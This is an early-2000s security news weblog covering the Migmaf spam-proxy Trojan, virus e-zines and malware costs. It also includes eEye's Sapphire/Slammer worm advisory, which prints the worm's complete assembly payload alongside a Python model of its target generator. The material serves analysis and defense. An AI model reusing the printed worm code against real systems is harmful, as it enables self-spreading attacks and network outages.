Tuesday, 22. July 2003
COMPUTER HIJACKING
Spam and Porn Servers Against Their Will
"migmaf" is not a Trojan like all the others: the malware, probably in circulation since the beginning of June, silently kidnaps computers and turns them into servers for spam and porn sites.
The curse of the web: spam is making e-mail increasingly unusable
Real hackers only look down on the pubescent script kiddies who write viruses. For them, the hacking community splits into just two camps worth taking seriously: the hackers or white hats on one side and the crackers or black hats on the other. The former see themselves as the heroes of Digitalia; the latter are criminals.
That does not mean, however, that they cannot write programs that command the respect of hackers and IT security experts alike. With "migmaf", for example, IT expert Richard Smith told "PC World", his first thought was just one thing: "Wow! That's interesting!"
P2P spam network
Because migmaf, which at first seemed no more than one of the usual many hundreds of annoying Trojans, quickly turned out to be something extraordinary.
The pest has probably been in circulation since the beginning of June and has infected only a few thousand computers since then. At first glance that is not much - but the virus apparently does not want any more.
Because migmaf serves up to its controllers - probably Russian crackers - access to the infected computer. They then complete the installation of a proxy server that is almost impossible for the victim to notice: the victim becomes part of the crack network - and, in the eyes of the many hundreds of thousands of e-mail account holders subsequently spammed, the perpetrator.
Because migmaf accomplishes anything but a trivial feat: it distributes spam mails over "its" network that are meant to lead the user to a pornographic website. That site has a fixed address, but no "location" on the Internet: every few minutes it apparently changes its IP address.
Ultimately, migmaf installs nothing other than the criminal caricature of a P2P network: from a central server its programmers "broadcast" their porn pages, which then "migrate" in constant rotation across the involuntary proxy servers of the computers infected by migmaf. With migmaf, then, everyone really and finally becomes a broadcaster - whether they want to or not.
[Graphic, DER SPIEGEL: Counted: spam e-mail volume by category]
In doing so, migmaf not only builds up an extraordinarily high capacity for sending spam, but also fairly effectively blurs the trail to the real originator.
Protection from discovery
But it goes further still. To be able to let the porn websites "migrate", migmaf installs a small DNS system on the infected computers. None of the kidnapped computers "broadcasts" porn pages for more than ten minutes - the "broadcasters" take turns at that rate. As long as there are enough of them, the extra traffic probably does not even catch the attention of the service providers, which in this case would actually be desirable: normally, massive extra traffic leads to a warning or reprimand from the service provider.
Security experts assume that there are already several versions of the virus; the major antivirus developers are working on programs that can reliably detect migmaf and similar programs. Until then, the only advice, above all to users of DSL lines, is never to run such a line without a properly working firewall. That can at least prevent migmaf from going "on air".
At least the question of what all this is supposed to achieve was answered very quickly: migmaf does nothing other than build a P2P network solely for distributing spam. And because the spam is distributed not from one but from thousands of constantly changing servers, spam filter software has a hard time keeping up.
Pyrrhic victory
Security experts at the US company LURHQ succeeded at the end of last week in shutting down the first confirmed migmaf network. No easy task: the experts reported that IP traces that normally took them a few minutes took a full seven days. Even then they could not be sure whether they had really found the "master server" or only the first of the victims in a chain of thousands.
One thing, however, seems clear: in principle, migmaf Trojans can be delivered with the help of any virus, and countless migmaf spam networks could be operated in parallel.
migmaf is thus the spam mafia's answer to the attempts to finally turn off the tap on junk advertising. It looks as though that will be even harder than thought: those are not pleasant prospects.
Frank Patalong
09:12
How Trojan horses turn other people's PCs into will-less spam monsters
Spammers based in Russia have for some time been spreading their electronic junk using a new, underhanded method: they smuggle Trojan horses onto the computers of unwitting victims, which then send out mass mails and serve as hosts for porn content. Security experts got the first indications of the illegal activity as early as the end of June, said Joe Stewart, analyst at security specialist Lurhq. At that time, mass mails advertising, among other things, Russian porn sites had attracted attention because they came from a different sender every few minutes.
HACKERS USE THE VICTIMS' IP ADDRESSES TO HIDE THEIR OWN
The Trojan horse named "Migmaf" (Migrant Mafia) serves as a kind of proxy server through which the spammers disguise their true origin. On the one hand it replaces the original address with the IP address of the infected computer; on the other it funnels the pornographic content through that computer when a spam recipient clicks on a link in the mass mail. To cover the tracks further, infected PCs are only ever used for a short time, according to the experts.
YOU CAN GET INFECTED PRACTICALLY ANYWHERE
How the spammers distribute the pest is not yet known. According to Stewart, a worm as carrier is just as possible as a manipulated ActiveX control. Infected files could also have been planted in online file-sharing networks such as Kazaa or brought onto the computers via IRC (Internet Relay Chat). (idg/oli)
08:59
Tuesday, 22. April 2003
The Trojan did it - Possession of child pornography
http://www.theinquirer.net/?article=9023
A MAN ACCUSED of having pornographic pictures of children on his PC was acquitted yesterday after a court heard that his machine was infected with a Trojan which probably auto-downloaded the images. The acquittal followed expert testimony that an examination of the hard drive belonging to Karl Schofield showed it was infected with the Trojan and that this was responsible for the downloads, an argument accepted by the prosecution service in Reading, in the UK.
Mr Schofield had denied making indecent images and claimed the Trojan might have infected his PC either through email or from pop-up adverts. The expert testified that the Trojan arrived on Mr Schofield's system the day before the images appeared. In the run-up to the case, according to the Reading Evening Post, Mr Schofield suffered vigilante attacks and had first to hide in his home and then move away to avoid continued attacks.
[via CYBERIA-L]
16:22
Monday, 27. January 2003
SQL Sapphire Worm Analysis
Forwarded from: "Marc Maiffret" <marc@eeye.com>
SQL Sapphire Worm Analysis
Release Date: 1/25/03
Severity: High
Systems Affected: Microsoft SQL Server 2000 pre SP 2
Description:
Late Friday, January 24, 2003 we became aware of a new SQL worm spreading quickly across various networks around the world.
The worm is spreading using a buffer overflow to exploit a flaw in Microsoft SQL Server 2000. The SQL 2000 server flaw was discovered in July, 2002 by Next Generation Security Software Ltd. The buffer overflow exists because of the way SQL improperly handles data sent to its Microsoft SQL Monitor port. Attackers leveraging this vulnerability will be executing their code as SYSTEM, since Microsoft SQL Server 2000 runs with SYSTEM privileges.
The worm works by generating pseudo-random IP addresses to try to infect with its payload. The worm payload does not contain any additional malicious content (in the form of backdoors etc.); however, because of the nature of the worm and the speed at which it attempts to re-infect systems, it can potentially create a denial-of-service attack against infected networks.
We have been able to verify that multiple points of connectivity on the Internet have been bogged down since 9pm Pacific Standard Time.
It should be noted that this worm is not the same as an earlier SQL worm that used the SA/nopassword SQL vulnerability as its spread vector. This new worm is more devastating as it is taking advantage of a software-specific flaw rather than a configuration error. We have already had many reports of smaller networks brought down due to the flood of data from the Sapphire Worm trying to re-infect new systems.
Corrective Action
We recommend that people immediately firewall SQL service ports at all of their gateways. The worm uses only UDP port 1434 (SQL Monitor Port) to spread itself to a new system; however, it is safe practice to filter all SQL traffic at all gateways. The following is a list of SQL server ports:
ms-sql-s 1433/tcp #Microsoft-SQL-Server
ms-sql-s 1433/udp #Microsoft-SQL-Server
ms-sql-m 1434/tcp #Microsoft-SQL-Monitor
ms-sql-m 1434/udp #Microsoft-SQL-Monitor
Once again this worm is taking advantage of a known vulnerability that has had a patch available for many months. Microsoft has also released a recent service pack for SQL (Service Pack 3) that includes a fix for this vulnerability.
Standalone patch:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-039.asp
SQL 2000 Service Pack 3:
http://www.microsoft.com/sql/downloads/2000/sp3.asp
Previous SQL Service Pack versions are vulnerable.
Technical Description
The following is a quick run-down of what the worm's payload is doing after infection:
1. Retrieves the addresses of GetProcAddress and LoadLibrary from the IAT in sqlsort.dll. It snags the necessary library base addresses and function entry points as needed.
2. Calls GetTickCount and uses the returned count as a pseudo-random seed.
3. Creates a UDP socket.
4. Performs a simple pseudo-random number generation formula using the returned GetTickCount value to generate an IP address that will later be used as the target.
5. Sends the worm payload in a SQL Server Resolution Service request to the pseudo-random target address, on port 1434 (UDP).
6. Returns to the formula and continues generating new pseudo-random addresses.
push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp
mov eax, 1010101h ; Reconstruct session: after the overflow the payload buffer gets corrupted during program execution but before the payload is executed.
xor ecx, ecx
mov cl, 18h
FIXUP:
push eax
loop FIXUP
xor eax, 5010101h
push eax
mov ebp, esp
push ecx
push 6C6C642Eh
push 32336C65h
push 6E72656Bh ; kernel32
push ecx
push 746E756Fh ; GetTickCount
push 436B6369h
push 54746547h
mov cx, 6C6Ch
push ecx
push 642E3233h ; ws2_32.dll
push 5F327377h
mov cx, 7465h
push ecx
push 6B636F73h ; socket
mov cx, 6F74h
push ecx
push 646E6573h ; sendto
mov esi, 42AE1018h ; IAT from sqlsort
lea eax, [ebp-2Ch] ; (ws2_32.dll)
push eax
call dword ptr [esi] ; call loadlibrary
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-10h] ; (kernel32.dll)
push eax
call dword ptr [esi] ; loadlibrary
push eax
mov esi, 42AE1010h ; IAT from sqlsort
mov ebx, [esi]
mov eax, [ebx]
cmp eax, 51EC8B55h ; check entry point fingerprint
jz short VALID_GP ; Check entry point fingerprint for GetProcAddress; if it fails, fall back to the GetProcAddress entry in another DLL version. Undetermined what DLL versions this will succeed on. Due to the lack of reliable importing this may not work across all DLL versions.
mov esi, 42AE101Ch ; IAT entry -> 77EA094C
VALID_GP:
call dword ptr [esi] ; GetProcAddress
call eax ; return from GetProcAddress = GetTickCount entry point
xor ecx, ecx
push ecx
push ecx
push eax
xor ecx, 9B040103h
xor ecx, 1010101h
push ecx ; 9A050002 = port 1434 / AF_INET
lea eax, [ebp-34h] ; (socket)
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
push 11h
push 2
push 2
call eax ; socket
push eax
lea eax, [ebp-3Ch] ; sendto
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
mov esi, eax ; save sendto -> esi
or ebx, ebx
xor ebx, 0FFD9613Ch
PRND:
mov eax, [ebp-4Ch] ; Pseudo Random Algorithm Start
lea ecx, [eax+eax*2]
lea edx, [eax+ecx*4]
shl edx, 4
add edx, eax
shl edx, 8
sub edx, eax
lea eax, [eax+edx*4]
add eax, ebx ; Pseudo Random Algorithm End
mov [ebp-4Ch], eax
push 10h
lea eax, [ebp-50h]
push eax
xor ecx, ecx
push ecx
xor cx, 178h
push ecx
lea eax, [ebp+3]
push eax
mov eax, [ebp-54h]
push eax
call esi ; sendto
jmp short PRND ; Jump back to Pseudo Random Algorithm Start
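The following is an added model of the PRND loop and the sockaddr layout from the listing above, written for this page and not taken from eEye's advisory. It reproduces the lea/shl/add/sub chain instruction by instruction, shows that it is a linear congruential generator with multiplier 214013 (the multiplier of the Microsoft C run-time rand()), and decodes each 32-bit state the way sendto() reads it, since the value at [ebp-4Ch] sits directly after the 9A050002 (AF_INET / port 1434) word and is therefore the in_addr in memory byte order. The seed value is a constructed stand-in for GetTickCount().

```python
import struct

MASK32 = 0xFFFFFFFF

# Increment the listing builds in ebx with "xor ebx, 0FFD9613Ch" if ebx were
# zero beforehand. The preceding "or ebx, ebx" does not clear ebx, so on a
# real infection the increment also depends on whatever ebx already held;
# the increment is therefore a parameter here rather than a fixed fact.
INCREMENT = 0xFFD9613C


def prnd_step(eax: int, ebx: int = INCREMENT) -> int:
    """One pass through the PRND block, mirroring the instruction chain."""
    ecx = (eax + eax * 2) & MASK32      # lea ecx, [eax+eax*2]  -> 3x
    edx = (eax + ecx * 4) & MASK32      # lea edx, [eax+ecx*4]  -> 13x
    edx = (edx << 4) & MASK32           # shl edx, 4            -> 208x
    edx = (edx + eax) & MASK32          # add edx, eax          -> 209x
    edx = (edx << 8) & MASK32           # shl edx, 8            -> 53504x
    edx = (edx - eax) & MASK32          # sub edx, eax          -> 53503x
    eax = (eax + edx * 4) & MASK32      # lea eax, [eax+edx*4]  -> 214013x
    return (eax + ebx) & MASK32         # add eax, ebx


def lcg_step(x: int, increment: int = INCREMENT) -> int:
    """The same update written as a plain linear congruential generator."""
    return (214013 * x + increment) & MASK32


def state_to_ip(state: int) -> str:
    """Decode a generator state as the in_addr sendto() sees it.

    The 32-bit register is stored little-endian at [ebp-4Ch], right after
    the AF_INET/port word at [ebp-50h], so the memory bytes are a.b.c.d.
    """
    return ".".join(str(b) for b in struct.pack("<I", state))


def targets(seed: int, count: int, increment: int = INCREMENT) -> list:
    """First `count` target addresses produced from a GetTickCount-style seed."""
    out = []
    state = seed & MASK32
    for _ in range(count):
        state = prnd_step(state, increment)   # mov [ebp-4Ch], eax
        out.append(state_to_ip(state))
    return out


if __name__ == "__main__":
    seed = 0x12345678   # constructed stand-in for the GetTickCount() value
    for ip in targets(seed, 5):
        print(ip)
```

Because the state is only 32 bits and the loop never terminates, a defender looking at a capture sees every infected host emit the same kind of sequence at line rate, which is why the advisory's filtering of UDP 1434 at gateways is the effective control.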
In Closing
We have provided brief information here as we are currently working to understand more of the worm's internal behavior. We will provide updates as they become available.
This worm has been dubbed the "Sapphire Worm" by eEye due to the fact that several engineers had to be pulled away from local bars to begin the investigation/dissection process.
Credit:
Riley Hassell
Related Links:
SQLSecurity.com
http://sqlsecurity.com/
Microsoft Security Bulletin:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-039.asp
Copyright (c) 1998-2003 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
Feedback
Please send suggestions, updates, and comments to:
eEye Digital Security
http://www.eEye.com
info@eEye.com [isn]
09:03
Massive Network Attack was a deliberate attack against South Korea
So is this cyberwar against South Korea or a worm and bad journalism?
02:30
Mobile code on the loose - worms break the internet again.
02:16
Saturday, 25. January 2003
Concerns Raised as Virus Writers Publish E-Zine
A group of hackers described as "prolific" virus writers by one analyst has published its first e-zine, raising concerns that the portal will fuel a new wave of malicious code and virus variants. According to security intelligence firm iDEFENSE, hackers who call themselves GEDZAC, or Zoneavirus, recently published the 'zine, titled Mitosis, which contains source code for a dozen viruses and tips, such as how to avoid detection by antivirus software. Ken Dunham, a senior intelligence analyst at iDEFENSE, says the fact that the group is organized enough to publish the 'zine is significant. "Most malicious coding groups fall apart or fail to progress to that level," Dunham says.
Dunham says the code will "invariably be used by a script-kiddie or individual learning how to create malicious code," likely resulting in faster development of new variants and "powerful blended threats." The new 'zine joins a growing list of publications, such as 2600 and Phrack, written for and by the hacker community. "The point to recognize is that the hacker community is more organized than most people realize," says Jon Ramsey, head of development at SecureWorks, a network intrusion detection and monitoring firm. Others see value for security professionals in the 'zines. "It's a classic tradeoff," says Ed Skoudis, VP of security strategy at consulting firm Predictive Systems. "They spread ideas among the bad guys and the not-so-elite bad guys, but they also let us good guys know what they're up to. All in all, it's kind of valuable."
[Securitynewsportal]
http://www.infosecuritymag.com/2003/jan/digest23.shtml#news4
10:53
Tuesday, 03. December 2002
Virus payloads bigger, nastier
IDGNet New Zealand Dec 2 2002 7:32PM ET [moreover Computersecurity]
07:46
Saturday, 23. November 2002
Next virus attack to cost SMEs billions
Research has revealed that the financial loss to SMEs when the next big computer virus hits could run to billions.
The next big computer virus attack could cost the UK's small and medium-sized enterprises (SMEs) £2.1bn, according to research carried out by McAfee Security.
The research showed that of the 70 percent of SMEs who said they had received a virus, all had lost money and suffered systems downtime as a result.
The average financial loss was £843 per company, equating to a total of £2.1bn, and the average downtime was 7.2 hours -- almost a full working day.
Nearly all the survey respondents agreed that cybercrime is on the increase (91 percent), but 12 percent still have no virus protection in place. Nearly half (43 percent) have no firewall protection from hackers.
Peter Scargill, IT chairman of the Federation of Small Businesses, said: "Many SMEs agree that cybercrime is a serious issue but fail to protect all of their computers or update protection regularly. Viruses or hacker attacks could be disastrous for many SMEs. They must start putting protection in place."
The survey also revealed that many SMEs do not subscribe to the generally accepted rule that prevention is better than cure, and wait until they are infected by a virus before taking action to address their vulnerability.
A third of respondents (32 percent) bought virus protection after they'd been infected by a virus.
Marc Vos, European product manager for McAfee Security, said: "It is very important that SMEs protect themselves against cyber crime properly. Although many have protection, it is useless unless they keep it regularly up-to-date."
He added: "Viruses tend to grab the news headlines but SMEs are often left wide open to other forms of cybercrime such as fraud or hacking. These threats are especially hazardous for high speed Internet users who are always connected and therefore always open to attack."
ZDNet Nov 22 2002 11:49AM ET [moreover Computersecurity]
09:21
Thursday, 21. November 2002
War with Iraq will mean virus outbreak, hacker says
A Malaysian virus writer who is sympathetic to the cause of the al-Qaeda terrorist group and Iraq and who has been connected to at least five other malicious code outbreaks is threatening to release a megavirus if the U.S. launches a military attack against Iraq...
Melhacker confirmed earlier reports by Chantilly, Va.-based iDefense Inc. that he has developed and tested a "three-in-one" megaworm code-named Scezda that combines features from the well-known SirCam, Klez and Nimda worms.
[The Hacktivist]
21:35
Computer Virus Families: Origins and Differences
Klez.F and Klez.I or Opaserv, Opaserv.D and Opaserv.H are just some examples of malicious code which due to common characteristics and roots are grouped into families by the antivirus industry. "The biggest families like I Love You or the veteran Marker can have as many as 60 variants," explains Luis Corrons, Virus Laboratory Director at Panda Software.
Sometimes a new variant of malicious code originates from another virus which has been modified. On other occasions, the authors of the virus create them using the basic features that define a family of viruses as a type of template. For this reason, some malicious code come in a series, behaving basically in the same way with only minimal differences such as the subject of the e-mail they arrive in or their ability to carry out certain actions, as the examples below illustrate:
Variants "I" and "F" of Klez: both are spread through e-mail and take advantage of the same vulnerability detected in the Internet Explorer browser (corrected by Microsoft), which makes it possible to execute the attached file automatically when viewed in the Preview Pane. The versions differ in the following ways:
Klez.I is sent in an e-mail message with text and has two attached files. The objective of this malicious code is to stop certain processes and erase files on infected computers.
Klez.F is sent in an e-mail with no text and includes only one attached file. It modifies some of the system controls (preventing the system from starting up correctly) and overwrites executable files, rendering them useless.
W32/Opaserv and W32/Opaserv.D are able to spread through networks and they attempt to access a web page to update some of their components. In order to infect, both worms create SCRSVR.EXE in the Windows directory, which contains their infection code. In addition W32/Opaserv.D generates the file TMP.INI in the root directory of the hard drive and enters an instruction in WIN.INI to activate the worm.
Opaserv.H is different in that the file that contains it comes in different sizes and is compressed with the PCShrink utility, which encrypts the code that causes the infection. The "J" variant of Opaserv has the ability to create various files in the infected computer. Among them "INSTIT.BAT", copies the worm that contains the infection code. "GUSTAV.SAT" and "INSTITU.VAT" are generated to exchange information with the web page they connect to.
I love you: variants differ, principally in the characteristics of the messages that are sent. The names of the attached files, the web pages they connect to and the file extensions which they affect, are all variable. The appearance within just a few hours of successive variants contributed greatly to their ability to spread.
Corrons also explained how, "Some variants still manage to spread, even though for some time now antivirus solutions have been available to detect and neutralize them." One example is the "I" variant of Klez, which appeared in April and still remains the most damaging malicious code affecting users over the past seven months, according to data collected by Panda ActiveScan. [Help Net Security]
14:04
Wednesday, 13. November 2002
Welsh Web designer charged with virus writing, child porn offences
By John Leyden
A 21-year-old Welsh Web designer has appeared in court charged with creating and distributing three mass mailer viruses.
Simon Vallor, of Llandudno, North Wales, also faced charges relating to the possession of indecent images of children in an appearance before Bow Street Magistrates Court last Friday (November 8). The appearance follows his arrest on suspicion of creating the Gokar, Redesi and Admirer mass mailing viruses.
Acting on information received from the FBI's Baltimore field office, Vallor was arrested on February 14 this year and charged with offences under section three of the Computer Misuse Act 1990. His computer was seized during this arrest, and its subsequent examination - allegedly - uncovered child porn.
North Wales police were assisted in their investigation by officers from Scotland Yard's specialist Computer Crime Unit. [The Register]
12:16
Tuesday, 22. October 2002
Bugbear hugs?
The recent Bugbear epidemic recently had pleasant repercussions for a colleague. An e-mail they had sent to an external business, which later became infected with the virus, was chosen for mass circulation. It ended up in many people's inboxes, one of whom turned out to be an old university friend. They had lost contact over the years, and thanks to the virus, now they're back in touch. ["Justin Macfarlane" <Justin.Macfarlane@lafferty.com> via risks-digest Volume 22, Issue 32]
09:44
disLEXia, a research project by Maximillian Dornseif